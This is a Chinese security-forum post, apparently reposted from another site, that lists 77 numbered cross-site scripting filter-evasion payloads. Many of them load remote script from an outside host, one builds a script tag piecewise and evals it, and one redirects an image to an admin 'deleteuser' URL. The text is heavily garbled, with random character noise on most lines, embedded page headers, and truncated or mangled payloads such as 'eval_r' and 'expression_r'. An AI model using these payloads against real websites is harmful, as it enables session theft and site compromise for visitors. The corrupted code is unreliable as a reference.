貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
. s& N D7 S! X(1)普通的XSS JavaScript注入
7 v3 p) n$ h+ I& L/ k<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( F" z3 y0 }& q(2)IMG标签XSS使用JavaScript命令& a6 \! B' b7 C# j
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( a* T' S8 x8 K2 W- K; r3 u' Z(3)IMG标签无分号无引号" N' l8 g* g" w" e2 ?
<IMG SRC=javascript:alert(‘XSS’)>
, p8 A% `, t* N5 _(4)IMG标签大小写不敏感
) \: w+ J" Z8 s/ h7 Q4 L: L<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ W- n/ w& q$ j6 U% L(5)HTML编码(必须有分号)
, ]' A t7 I) Z. `<IMG SRC=javascript:alert(“XSS”)>
! z9 M% X/ ^0 l(6)修正缺陷IMG标签
9 S m8 Z. X9 v/ R<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* C& `' F" y! j# R- m* V9 I7 i1 Q# [5 G5 h: u
* d6 I* k6 Y7 t(7)formCharCode标签(计算器)$ f- b5 R i( M7 X2 T1 ?; E
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, r$ s: s5 W. E7 R. j$ r8 S(8)UTF-8的Unicode编码(计算器)' O8 W: r6 V8 M( `. S
<IMG SRC=jav..省略..S')>& }/ H- q! w, g8 k* P4 |3 q6 I
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
1 c9 \$ e& C+ ^: X2 I<IMG SRC=jav..省略..S')>
& s. A3 P K4 k9 M8 C _ m(10)十六进制编码也是没有分号(计算器)* w0 k8 S: S6 P! Z
<IMG SRC=java..省略..XSS')>
$ s* O `+ G1 s: c$ x0 o(11)嵌入式标签,将Javascript分开
! a" I# q4 \+ W2 k<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 Z3 ?$ A, w6 F. r; P- {& [(12)嵌入式编码标签,将Javascript分开
# a1 n3 s/ Q* b9 e<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 }) C7 N& ?8 r" a& E+ q. {(13)嵌入式换行符
8 s/ W( a2 A# _<IMG SRC=”jav ascript:alert(‘XSS’);”>
' z( T; C8 _/ [) q" `9 Q2 H) E( a(14)嵌入式回车" j2 q6 b5 C+ j) ]
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, l6 b! P3 J. S+ }# d(15)嵌入式多行注入JavaScript,这是XSS极端的例子1 }& r( D$ I/ \1 v- g* a
<IMG SRC=”javascript:alert(‘XSS‘)”>
8 R X8 M. L4 b$ x, N(16)解决限制字符(要求同页面)% x& h' m. I( J: R6 M% T6 x
<script>z=’document.’</script>0 q, w, S( u- c4 l) }: p
<script>z=z+’write(“‘</script>$ w4 F- F7 }- D5 {
<script>z=z+’<script’</script>
) B+ g& V, F# i; |8 w7 f<script>z=z+’ src=ht’</script>7 \! k3 }4 [( j
<script>z=z+’tp://ww’</script> T& g7 v8 ?( o# q; p1 B
<script>z=z+’w.shell’</script>( _$ ]. @+ s6 H5 c3 C+ v6 ~9 S# y
<script>z=z+’.net/1.’</script>' S2 Q N; O" w0 i! z( d
<script>z=z+’js></sc’</script>* [: y% D1 b4 R: h# C' P* O
<script>z=z+’ript>”)’</script>" r6 _% e# N, @. J5 O, v( ^* _4 U/ o
<script>eval_r(z)</script>
* q6 T# ^+ k" ], B(17)空字符12-7-1 T00LS - Powered by Discuz! Board7 W( K3 I! n9 E/ s0 ]5 {' w5 d
https://www.t00ls.net/viewthread ... table&tid=15267 2/64 n- }) j5 ~! n x
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 Y: e' u d5 h! W8 N
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 D0 c. E$ ?3 Y( a" I8 D6 }1 q1 W9 Lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
% O! s9 U) M1 L' l5 ~: g(19)Spaces和meta前的IMG标签
' e0 O! Z" U1 g4 {6 I$ x- F* O<IMG SRC=” javascript:alert(‘XSS’);”>8 s0 u9 f g# t6 r, ] j- Z7 }3 Q, H
(20)Non-alpha-non-digit XSS
( c. J5 e! \( d1 n* ^ z<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ w3 n2 x: |7 L, E) a
(21)Non-alpha-non-digit XSS to 27 ^* @# J; y+ P# Y4 I! ^& M
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ y. g- V3 d) l; u$ k
(22)Non-alpha-non-digit XSS to 3
0 {) V1 [. |: F2 ^! j5 Z7 y<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>( K8 F) V3 F# h, t6 B) Y
(23)双开括号; T1 M2 y1 i$ C) ]6 v' D0 I$ I
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 }5 ?1 w& D$ S6 J$ [5 S2 ^, y1 W(24)无结束脚本标记(仅火狐等浏览器)/ U) ?4 B/ p3 E2 \) }4 a
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 I. h6 V& F6 s(25)无结束脚本标记2
. E4 `1 z- T8 q" G, D<SCRIPT SRC=//3w.org/XSS/xss.js>
w# O& a' x5 k# p- f7 ~. i(26)半开的HTML/JavaScript XSS$ i2 @6 c8 s2 t* z8 ~! i
<IMG SRC=”javascript:alert(‘XSS’)”" ?8 A) C! e: E
(27)双开角括号
N4 ]+ E/ Z3 J X' e- {5 B<iframe src=http://3w.org/XSS.html <
1 _" J1 c) H' b6 x& f- c(28)无单引号 双引号 分号
: X3 P, \! s. K1 g( |" D( r/ `<SCRIPT>a=/XSS/, d" E& V% H: @( @
alert(a.source)</SCRIPT>
# |% n4 A' m7 f- M8 a(29)换码过滤的JavaScript0 t3 F, p3 V W# i( _6 G
\”;alert(‘XSS’);//
6 I' H/ i. h/ b(30)结束Title标签
3 x, [# j# _& V0 |, D</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
* U$ r$ c: P5 n9 l2 ^/ N0 g(31)Input Image7 x6 ^* f, J7 A0 n) ~- v
<INPUT SRC=”javascript:alert(‘XSS’);”>
j J N4 S- P; l0 V(32)BODY Image
7 h: G, B; _1 N, D<BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 v& b% `$ K6 ^! |1 k
(33)BODY标签
1 W- l3 L% ]0 }0 z: n<BODY(‘XSS’)>% w( b( H9 M# U- j4 T
(34)IMG Dynsrc
% D. t; P# K+ e% \6 W<IMG DYNSRC=”javascript:alert(‘XSS’)”># u( _/ t+ d4 Z5 C
(35)IMG Lowsrc
8 |# `3 x) J4 Y0 T<IMG LOWSRC=”javascript:alert(‘XSS’)”>! l3 O1 H* X% t
(36)BGSOUND
9 }7 Q+ y6 p* w5 ^4 r- W9 a<BGSOUND SRC=”javascript:alert(‘XSS’);”>8 |3 `; |1 Y) f
(37)STYLE sheet
7 \# I) D; t& ~- ]0 k) p; o<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>3 q" k/ C) u2 g0 q3 M+ J5 ?; T. S
(38)远程样式表0 E; Q2 z2 l6 r
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
7 W+ B4 m0 }8 D+ r! A& Q8 ~(39)List-style-image(列表式)
$ `+ ]; j3 J0 M7 I+ o- i<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
. q1 N6 [% W" F! s! A) p2 |(40)IMG VBscript; d# H8 E9 E( H; A3 F3 Y
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS% f/ R* L8 S) ]- T7 j2 |( a
(41)META链接url
3 C# [: C+ i) p, `$ ]+ j. F, {( m# T' b1 x
l3 p( V8 I, N) E1 p8 v% M
<META HTTP-EQUIV=”refresh” CONTENT=”0;9 p5 i/ m+ H' i7 u5 l; l+ u
URL=http://;URL=javascript:alert(‘XSS’);”>6 s7 P2 }/ A! M% f
(42)Iframe
4 { B8 H$ j( {# {5 q! Y# [4 B. \<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 v1 S- T6 t$ m/ @; M. H6 Z(43)Frame
+ h% N/ C) i8 ?<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board' T+ {9 v' ^7 S
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
- }6 [4 T9 ]6 C: K; m2 ?% b(44)Table$ n `1 ^! Y$ I0 o9 Q _
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
8 f0 z# N! z( U( ^ C2 x' Y0 i(45)TD. H/ ~; L( g) O, d* u
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>5 Y1 J: B( v( W- \
(46)DIV background-image1 i7 |2 y9 Z$ W( x# B
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' U$ q1 A* t; _9 B(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
% @/ M/ q2 W) }5 Z& H, J8&13&12288&65279)/ E9 u0 n' O7 C' n L! [
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 V) O0 j7 N6 A) O% P(48)DIV expression0 ^0 d1 h& K' k, @1 m0 u0 b/ |0 ^
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>& y# G* R7 J0 [& i8 h! F9 ^
(49)STYLE属性分拆表达
: q# H8 T6 ]! N# N! E<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! b: d+ g; S& u; i% b' V5 P(50)匿名STYLE(组成:开角号和一个字母开头)
5 g: R/ A- p% `- X3 q) [<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% i3 A; N# {7 |' q
(51)STYLE background-image
# Q* J/ y$ Z# W. B( l9 @<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A# g( O3 k) |0 ?- V
CLASS=XSS></A>( W: s& n% F* ]
(52)IMG STYLE方式6 ?4 F8 m% X' H1 Z* \# T
exppression(alert(“XSS”))’>8 r5 X, }1 K- A# b: Q- W
(53)STYLE background
2 N. l- `. i6 d, Y2 a<STYLE><STYLE7 ?, L& v6 {. {& V
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 V9 n$ J( ?9 }8 e(54)BASE
2 D* N- o8 o: D<BASE HREF=”javascript:alert(‘XSS’);//”>0 A4 N% O1 R$ z7 N% E2 M
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
v8 \5 d" _* ]% T+ R7 T<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, y0 p/ [% c" R+ V* t: Y(56)在flash中使用ActionScrpt可以混进你XSS的代码
" D3 {. X0 V5 S }5 H- Za=”get”;$ t% g- A3 U) y7 M: m/ u! m
b=”URL(\”";
}8 a7 b: D4 \' e4 N, v, I' nc=”javascript:”;2 Q8 N/ @; l' e& d: V' M+ j
d=”alert(‘XSS’);\”)”;# X3 D+ o1 M, H6 S/ A1 h2 Y# p5 Z1 I1 |
eval_r(a+b+c+d);
$ C- y. v' R2 `(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上# z! X' R9 z. J* N, p- _6 C
<HTML xmlns:xss>
" C+ p$ o5 @) s$ b( K<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”> B% D$ x; q) T% \" w
<xss:xss>XSS</xss:xss>
- b8 Q1 Y7 s( }7 Q, U</HTML>" \& f, r: l, d$ E; l v7 Y
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
5 D6 x6 _9 y J, H- I2 y/ U<SCRIPT SRC=””></SCRIPT>+ P8 D* ~8 P4 D: L
(59)IMG嵌入式命令,可执行任意命令
( d# F) y- T6 \! E<IMG SRC=”http://www.XXX.com/a.php?a=b”>
% W& T$ n5 W0 ~+ V7 b9 Z7 {+ }(60)IMG嵌入式命令(a.jpg在同服务器)9 T1 D2 h# m) t
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser- e/ I9 H9 ~7 Z: o- }
(61)绕符号过滤
; h; | s4 y) V- l1 R& a<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! c2 S& a4 B7 V6 c6 ~" m& T(62)
. F5 m( A% Q; p. e! O<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 ?! k6 D( R/ h! u(63)
0 g' e8 [+ G+ {# q3 q7 k: b<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT> D5 z4 o5 g2 k# ~' W$ d
(64)
; I. P. n+ y- e" K4 d<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>, O6 `# v' e' W
(65)
/ H q7 o$ ~* D& C<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
8 f; X# m; s1 h(66)12-7-1 T00LS - Powered by Discuz! Board; `# p0 f7 I2 T# K8 V2 I3 r- n4 h9 M
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
2 L2 r& x4 e6 j+ c% K<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>; Y& c5 e |& @$ d. C
(67). J. ]- }& c2 a
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
% S) @% D, z( A1 L$ j</SCRIPT>
E. ]( Z% m: H- s, N! F1 K0 o7 R! c(68)URL绕行& v! O2 Y. v) j4 ^, n
<A HREF=”http://127.0.0.1/”>XSS</A>9 t( h4 G# w! T9 i: x
(69)URL编码
6 K+ a$ B- P6 d R! H<A HREF=”http://3w.org”>XSS</A>
1 x7 S% O5 `& C5 ^8 j! L(70)IP十进制6 t: L% o) V3 e4 t
<A HREF=”http://3232235521″>XSS</A>
8 j! V- x0 D: d(71)IP十六进制
& C8 _3 d' x5 {<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
% O) ]0 X1 B- O( |$ j(72)IP八进制, [5 V1 y& c3 c/ |$ y
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
! a! I0 k0 H( S) w Q( O" w7 `(73)混合编码1 U: d: t. W n8 m* l* n; T
<A HREF=”h
5 ^2 g- T# D' N/ Xtt p://6 6.000146.0×7.147/”">XSS</A>8 Z0 F2 V- C9 ^: _7 f
(74)节省[http:] O2 u$ [1 s& r
<A HREF=”//www.google.com/”>XSS</A>+ n; H d2 y8 m( L7 j
(75)节省[www]" L$ H9 f& J! @# T
<A HREF=”http://google.com/”>XSS</A>
: v5 {% q4 k' X; v' D9 O(76)绝对点绝对DNS
) C9 l `3 d7 @<A HREF=”http://www.google.com./”>XSS</A>
' h& ^+ ~& w; Q5 p(77)javascript链接
) F8 ^ a3 r0 q8 a<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
& k7 a5 w' l8 m1 L
; [% v/ g2 v- A" G原文地址:http://fuzzexp.org/u/0day/?p=14
. U0 N$ ^3 m6 h3 L* i
6 X$ i& n8 G5 J; O |
发表于 2013-4-19 19:22:37
收藏
支持
反对